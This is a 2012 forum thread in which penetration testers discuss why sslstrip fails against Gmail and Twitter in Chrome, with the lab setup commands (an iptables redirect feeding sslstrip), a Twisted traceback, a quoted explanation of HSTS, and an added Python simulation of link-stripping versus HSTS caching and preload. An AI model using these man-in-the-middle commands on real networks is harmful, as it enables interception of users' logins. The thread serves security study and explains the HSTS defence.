diggler Posted January 15, 2012 (edited January 16, 2012 by diggler)

Hey Guys,

Can anyone confirm the same results? When testing in my lab SSLStrip works/doesn't work with the following sites:

NOTE: client browser Google Chrome 17.0.963.33 beta on Mac OS X

YES
- linkedin.com
- facebook.com

NO
- mail.google.com
- twitter.com

If others get the same result, could it be that the big co's have found a way to prevent the attack?

I get the following error output from SSLStrip after visiting GMAIL.

MK3 AP51 v2.0.1 w/ BT5R1

    cd /pentest/web/sslstrip
    chmod +x sslstrip.py
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    ./sslstrip.py -l 10000 -k -f
    tail -f sslstrip.log

    root@bt:~/pentest# cd /pentest/web/sslstrip/
    root@bt:/pentest/web/sslstrip# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    root@bt:/pentest/web/sslstrip# ./sslstrip.py -l 10000 -k -f

    sslstrip 0.9 by Moxie Marlinspike running...
    Traceback (most recent call last):
      File "./sslstrip.py", line 105, in main
        reactor.run()
      File "/usr/lib/python2.6/dist-packages/twisted/internet/base.py", line 1170, in run
        self.mainLoop()
      File "/usr/lib/python2.6/dist-packages/twisted/internet/base.py", line 1182, in mainLoop
        self.doIteration(t)
      File "/usr/lib/python2.6/dist-packages/twisted/internet/selectreactor.py", line 140, in doSelect
        _logrun(selectable, _drdw, selectable, method, dict)
    --- <exception caught here> ---
      File "/usr/lib/python2.6/dist-packages/twisted/python/log.py", line 84, in callWithLogger
        return callWithContext({"system": lp}, func, *args, **kw)
      File "/usr/lib/python2.6/dist-packages/twisted/python/log.py", line 69, in callWithContext
        return context.call({ILogContext: newCtx}, func, *args, **kw)
      File "/usr/lib/python2.6/dist-packages/twisted/python/context.py", line 59, in callWithContext
        return self.currentContext().callWithContext(ctx, func, *args, **kw)
      File "/usr/lib/python2.6/dist-packages/twisted/python/context.py", line 37, in callWithContext
        return func(*args,**kw)
      File "/usr/lib/python2.6/dist-packages/twisted/internet/selectreactor.py", line 156, in _doReadOrWrite
        self._disconnectSelectable(selectable, why, method=="doRead")
      File "/usr/lib/python2.6/dist-packages/twisted/internet/posixbase.py", line 191, in _disconnectSelectable
        selectable.readConnectionLost(f)
      File "/usr/lib/python2.6/dist-packages/twisted/internet/tcp.py", line 508, in readConnectionLost
        self.connectionLost(reason)
      File "/usr/lib/python2.6/dist-packages/twisted/internet/tcp.py", line 677, in connectionLost
        Connection.connectionLost(self, reason)
      File "/usr/lib/python2.6/dist-packages/twisted/internet/tcp.py", line 519, in connectionLost
        protocol.connectionLost(reason)
      File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 489, in connectionLost
        self.handleResponseEnd()
      File "/pentest/web/sslstrip/sslstrip/ServerConnection.py", line 119, in handleResponseEnd
        HTTPClient.handleResponseEnd(self)
      File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 500, in handleResponseEnd
        self.handleResponse(B)
      File "/pentest/web/sslstrip/sslstrip/ServerConnection.py", line 134, in handleResponse
        self.shutdown()
      File "/pentest/web/sslstrip/sslstrip/ServerConnection.py", line 154, in shutdown
        self.client.finish()
      File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 900, in finish
        "Request.finish called on a request after its connection was lost; "
    exceptions.RuntimeError: Request.finish called on a request after its connection was lost; use Request.notifyFinish to keep track of this.

    (the same traceback is printed a second time)
diggler (Author) Posted January 16, 2012 (edited January 16, 2012 by diggler)

I received this comment from the man himself...

"Both use HSTS headers now, so if you're using a browser that supports them (like Chrome), there's no opportunity for sslstrip to do anything. That output is from Twisted, and it doesn't indicate any actual problem."

UPDATE1: http://www.owasp.or...nsport_Security

UPDATE2: SSLStrip still works against Safari. Definitely broken with FF and Chrome tho :( Now what?

UPDATE3: "HSTS fixes this problem by informing the browser that connections to the site should always use SSL. Of course, the HSTS header can be stripped by the attacker if this is the user's first visit. Chrome attempts to limit this problem by including a hard-coded list of HSTS sites.[11] Unfortunately this solution cannot scale to include all websites on the internet; a more workable solution can be achieved by including HSTS data inside DNS records, and accessing them securely via DNSSEC."
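The mechanism behind the quoted HSTS explanation, as an added example that is not part of the thread and not sslstrip's own code: a small Python model of a browser with an HSTS policy cache and a preload list, an sslstrip-style proxy that downgrades https links in the page it relays over plain http, and three page loads that show where the strip succeeds. The hostnames (mail.example.com, example.com), the SERVER_RESPONSE header and body, and the Browser/attacker_proxy/visit/scenarios names are all constructed for illustration; the parsing rules follow RFC 6797 (max-age mandatory, header only honoured over https, includeSubDomains needed for a parent-domain policy to cover a subdomain).

```python
"""Added example: why HSTS defeats sslstrip, and where the first-visit gap remains.
Not code from the thread or from sslstrip. Hostnames, the server response and the
Browser/attacker roles are constructed for illustration."""
import re
import time
from urllib.parse import urlsplit

# Constructed: what the real site would send over https. Not a capture.
SERVER_RESPONSE = {
    "headers": {"Strict-Transport-Security": "max-age=31536000; includeSubDomains"},
    "body": '<a href="https://mail.example.com/login">Sign in</a>',
}


def strip_https(body):
    """What sslstrip does to a relayed page: downgrade every https:// link to http://."""
    return re.sub(r"https://", "http://", body)


def parse_hsts(value):
    """Parse a Strict-Transport-Security header (RFC 6797). Returns None if invalid."""
    directives = {}
    for part in value.split(";"):
        name, _, val = part.strip().partition("=")
        if name:
            directives[name.strip().lower()] = val.strip().strip('"')
    max_age = directives.get("max-age", "")
    if not max_age.isdigit():
        return None  # max-age is mandatory
    return {"max_age": int(max_age),
            "include_subdomains": "includesubdomains" in directives,
            "preload": "preload" in directives}


class Browser:
    """Minimal HSTS-aware client: a policy cache plus an optional preload list."""

    def __init__(self, preload=()):
        self.hsts = {}  # host -> (expiry, include_subdomains)
        self.preload = {h.lower() for h in preload}  # assumed to cover subdomains

    def _policy_covers(self, host):
        labels = host.lower().split(".")
        for i in range(len(labels)):
            candidate = ".".join(labels[i:])
            if candidate in self.preload:
                return True
            entry = self.hsts.get(candidate)
            # exact host always applies; a parent domain only with includeSubDomains
            if entry and entry[0] > time.time() and (i == 0 or entry[1]):
                return True
        return False

    def request(self, url):
        """URL the browser actually opens: http is upgraded when a policy applies."""
        parts = urlsplit(url)
        if parts.scheme == "http" and self._policy_covers(parts.hostname):
            return "https://" + url[len("http://"):]
        return url

    def receive(self, url, headers):
        """Record an HSTS policy; the header is only honoured over https (RFC 6797)."""
        parts = urlsplit(url)
        value = headers.get("Strict-Transport-Security")
        if parts.scheme != "https" or value is None:
            return
        policy = parse_hsts(value)
        if policy is None:
            return
        host = parts.hostname.lower()
        if policy["max_age"] == 0:
            self.hsts.pop(host, None)  # max-age=0 revokes the policy
        else:
            self.hsts[host] = (time.time() + policy["max_age"], policy["include_subdomains"])


def attacker_proxy(url):
    """sslstrip's role: fetch over https upstream, relay over http with links downgraded.
    The HSTS header never reaches the victim, and would be ignored over http anyway."""
    return {"headers": {}, "body": strip_https(SERVER_RESPONSE["body"])}


def visit(browser, typed_url="http://mail.example.com/"):
    """One page load. Only plain-http requests hit the port-80 redirect into sslstrip."""
    fetched = browser.request(typed_url)
    if fetched.startswith("https://"):
        browser.receive(fetched, SERVER_RESPONSE["headers"])  # direct TLS, nothing to strip
        return {"fetched": fetched, "stripped": False}
    response = attacker_proxy(fetched)
    browser.receive(fetched, response["headers"])
    return {"fetched": fetched, "stripped": "https://" not in response["body"]}


def scenarios():
    """Map each situation to whether sslstrip managed to strip the page."""
    first = Browser()  # fresh profile, no preload: the first-visit gap
    cached = Browser()  # has reached the site over https before and cached the policy
    cached.receive("https://mail.example.com/", SERVER_RESPONSE["headers"])
    preloaded = Browser(preload=["example.com"])  # hard-coded list closes the gap
    return {"first_visit": visit(first)["stripped"],
            "cached_hsts": visit(cached)["stripped"],
            "preloaded": visit(preloaded)["stripped"]}


if __name__ == "__main__":
    for name, stripped in scenarios().items():
        print(f"{name:12s} stripped={stripped}")
```

Running it reports first_visit stripped=True and the other two False: once a policy is cached or preloaded the browser never emits the plain-http request, so the iptables port-80 redirect has nothing to hand to sslstrip, which matches the thread's Chrome results. The browser-side checks also show why the attacker cannot simply inject a max-age=0 header to clear the policy: it is ignored unless it arrives over https.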
telot Posted January 16, 2012

> I received this comment from the man himself... (quoting diggler's post above in full)

Thanks for following through on this Diggler! I was just going to get into sslstrip this weekend, so this is some great food for thought. Thanks very much

telot